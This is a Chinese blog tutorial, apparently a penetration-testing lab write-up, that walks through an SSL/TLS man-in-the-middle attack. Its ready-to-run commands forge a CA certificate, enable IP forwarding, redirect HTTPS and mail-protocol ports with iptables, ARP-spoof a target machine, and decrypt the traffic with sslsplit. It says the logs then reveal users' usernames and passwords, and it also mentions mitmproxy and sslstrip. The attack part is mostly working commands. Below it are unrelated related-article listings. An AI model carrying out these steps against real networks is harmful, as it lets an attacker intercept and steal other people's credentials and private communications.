SSL\TLS中间人攻击

最新推荐文章于 2024-02-05 02:06:51 发布
最新推荐文章于 2024-02-05 02:06:51 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/126636383
版权

  • 攻击者位于客户端和服务器通信链路中

  • ARP

  • DHCP

  • 修改网关

  • 修改DNS

  • 修改HOSTS

  • ICMP\STP\OSPF

  • 加密流量

  • 攻击的前提

  • 客户端已经信任伪造证书颁发机构

  • 攻击者控制了核心证书颁发机构

  • 客户端程序禁止了显示证书错误告警信息

  • 攻击者已经控制客户端,并强制其信任伪造证书

SSLsplit

  • 透明SSL/TLS中间人攻击工具

  • 对客户端伪装为服务器,对服务器伪装成普通客户端

  • 伪装服务器需要伪造证书

  • 支持SSL/TLS加密的SMTP\POP4\FTP等通信中间人攻击

  • 利用openssl生成证书私钥

openssl  genrsa   -out  ca.key  2048

图片

  • 利用私钥签名生成证书
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

图片

  • 启动路由
sysctl -w net.ipv4.ip_forward=1

图片

  • 配置iptables端口转发规则
iptables -t nat -F  (全部清空)iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSAiptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPSiptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPSiptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3Siptables -t nat -L

图片

  • 下一步就是要进行ARP欺骗,看下我们的靶机

图片

  • ARP欺骗
arpspoof -i eth0 -t  192.168.0.118 -r 192.168.0.1

图片

图片

  • 启动SSLsplit
mkdir -p test/logdirsslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

图片

  • 之后靶机访问网站都是使用我们伪造的证书,之后我们在logdir里面可以看到日志,包括用户数据的用户名和密码等等

Mitmproxy

mitmproxy -T --host -w mitmproxy.log

这个不演示了,也是一样,搞个ARP欺骗,侦听一个端口,就行了

SSLstrip

  • 与之前两种工具不同,将客户端到中间人之间的流量变为明文
sslstrip  -l 8080
网络点点滴
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
SMVHunter:一套用于在Android应用中执行SSLTLS中间人漏洞的大规模自动检测的工具
05-01
===========用于在Android应用程序中执行SSL / TLS中间人漏洞的大规模自动检测的工具集。 环境 ========== Ubuntu v12.04 + Apktool v1 Python v2.7 Java SDK v1.4 + Android工具(adb,模拟器,android) 执行...
ssl中间人攻击
qq_44890392的博客
06-27 2337
攻击机:kali; ip地址:192.168.0.130 目标机:windows7虚拟机; ip地址:192.168.0.131 vm网关:192.168.0.2 SSL为安全套阶层协议。使用加密的方式保证链接的安全性。SSL协议包括用于数据传输SSL记录协议和用于建立安全链接的SSL握手协议。SSL记录协议使用对称密码体系进行数据的加密,秘钥由SSL握手协议通过非对称加密方式进行交换。 ssl中间人攻击,顾名思义,就是在SSL回话中,作为客户端和服务器端中间的代理,进行
如何应对SSL/TLS加密中的中间人攻击(MITM)?
图幻未来的博客
02-05 415
在当今的数字世界中, SSL/TLS 加密的通信已成为保护用户隐私和数据安全的关键手段之一. 然而,随着网络攻击技术的不断发展,中间人攻击(MITM)成为了一个日益严重的安全威胁. 本文将深入探讨 MITM 攻击的原理以及应对措施以帮助企业和个人提高安全意识并减少潜在风险.* **篡改与重放: ** 对被拦截的流量进行修改或重新发送以达到窃听的目的或者是实施其他恶意行为如伪造证书等.* **拦截:** 攻击者在网络节点处截获通信双方的数据流;**1.1 原理****1.2 危害**
TLS是如何保障数据传输安全(中间人攻击)
dotNET跨平台
05-25 1211
前言前段时间和同事讨论HTTPS的工作原理,当时对这块知识原理掌握还是靠以前看了一些博客介绍,深度不够,正好我这位同事是密码学专业毕业的,结合他密码学角度对tls加解密(DH这块)的阐述,...
HTTPS攻击(SSL/TLS中间人攻击
初学者L_言的博客
03-01 2729
一、场景环境 攻击机: kali 目标机: WinServer 2003 二、原理 攻击前提: 客户端已经信任伪造证书颁发机构; 攻击者控制了核发证书颁发机构; 客户端程序禁止了显示证书错误告警信息; 攻击者已经控制客户端,并强制其信任伪造证书。 角色: 客户端、客户路由器、真实服务器、攻击者代理服务器 (攻击者代理服务器)攻击者 通过ARP欺骗客户端通过攻击者做网关,数据包通过攻击者发出。此...
HTTPS的加密技术——中间人攻击
闲来垂钓碧溪上的博客
05-24 1387
https是基于http的一层加密技术,有两种加密方式,针对不同的数据传输可以使用不同加密算法结合使用,最常用也最安全的是双重加密技术,不过单独使用还是会有风险,对于中间人攻击这个算法也会被偷梁换柱,于是需要引入证书对症下药,以此来保障数据的安全性和完整性。
SSL_TLS 攻击原理解析
hl1293348082的专栏
03-25 2106
本文主要描述 HTTPS 中对于 ssl/tls 加密的攻击手法,什么是 HTTPS 呢?百度百科的解释如下: HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer),是以安全为目标的 HTTP 通道,简单讲是 HTTP 的安全版。即 HTTP 下加入 SSL 层,HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。 0x01 知识铺垫 ssl/tls 用途 1、为实现 CIA (保密性, 完整性, 可用性)
五种工具理解SSL/TLS中间人攻击
redwand的博客
04-06 4018
本文先使用ettercap实现了普通的中间人攻击,然后根据burpsuite抓取https流量的原理,解析了sslsplit解密ssl流量的过程,同时演示了mitmproxy的劫持方式,最后简单说明了sslstrip的工作原理,通过多种实验的方式更好的学习了sll中间人攻击
Https中间人攻击
yshir
11-04 4320
Https中间人攻击 https协议由 http + ssl 协议构成,具体的链接过程可参考SSLTLS握手的概述 中间人攻击过程如下: 服务器向客户端发送公钥。 攻击者截获公钥,保留在自己手上。 然后攻击者自己生成一个【伪造的】公钥,发给客户端。 客户端收到伪造的公钥后,生成加密hash值发给服务器。 攻击者获得加密hash值,用自己的私钥解密获得真秘钥。 同时生成假的加密hash值,发给服务器。 服务器用私钥解密获得假秘钥。 服务器用加秘钥加密传输信息 防范方法: 服务端在发.
SSL-CCS注入漏洞分析与中间人攻击实现
08-23
SSL-CCS注入漏洞分析与中间人攻击实现。有不对的地方欢迎指正
中间人攻击原理
01-05
中间人Stunnel:它是针对本身无法进行TLSSSL通信的客户端及服务器而设计的一种小型开源软件,Stunnel可提供安全的加密连接。它的作用是接受Apache代理解密后的数据并将这些数据再次加密,冒充原客户端去与目标...
tls-gen:生成对开发有用的自签名x509TLSSSL证书
04-29
TLS / SSL证书生成器 tls-gen是基于OpenSSL的工具,可生成用于开发和QA环境的自签名证书。 该项目最初是从许多测试套件中提取的。... :具有两个中间证书(一个用于服务器,一个用于客户端)和由中间人
Android安全之Https中间人攻击漏洞
09-18
中间人攻击,Man-in-the-middle attack,缩写:MITM,是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者...
智慧酒店项目智能化系统汇报方案qy.pptx
04-30
智慧酒店项目智能化系统汇报方案qy.pptx
基于C语言编写的高并发Epoll服务器.zip
04-30
基于C语言编写的高并发Epoll服务器.zip
liba2ps1-4.14-bp156.5.5.ppc64le.rpm
04-30
liba2ps1-4.14-bp156.5.5.ppc64le
基于matlab实现囚徒困境中的博弈策略的模拟:尝试了采用几种策略进行博弈使最终双赢的概率变大.rar
最新发布
04-30
基于matlab实现囚徒困境中的博弈策略的模拟:尝试了采用几种策略进行博弈使最终双赢的概率变大.rar
squid/sslbump 部署环境对ssl实施中间人攻击
12-20
Squid/sslbump 部署环境是一种常见的代理服务器部署环境,可以用于拦截和篡改传输的数据。其中的 sslbump 功能可以实施中间人攻击,即代理服务器可以伪装成客户端与服务器之间的通信双方,使双方都认为是在与对方直接通信,但实际上所有的数据都经过了代理服务器的篡改。 在这样的部署环境下,攻击者可以利用 sslbump 功能来获取用户与服务器之间的所有通信数据,包括敏感信息如用户名、密码、信用卡信息等。攻击者可以通过代理服务器中间人攻击的方式,窃取通信双方的信息,并且还能够对通信数据进行篡改,例如注入恶意代码、窃取隐私数据等。 同时,由于 sslbump 功能可以对双向的 SSL/TLS 连接进行拦截和篡改,因此攻击者可以利用这一功能对服务器发送的数据进行篡改,比如修改返回的网页内容、植入恶意脚本等。这种攻击方法对通信安全造成了极大的威胁,容易导致用户信息泄露、隐私泄露和网络安全事故的发生。 因此,在部署 squid/sslbump 环境时,需要加强对通信数据的加密和验证,同时要严格控制代理服务器的权限和访问策略,防范中间人攻击,确保通信的安全可靠。另外,也应该加强对代理服务器本身的安全防护,避免被攻击者利用漏洞进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值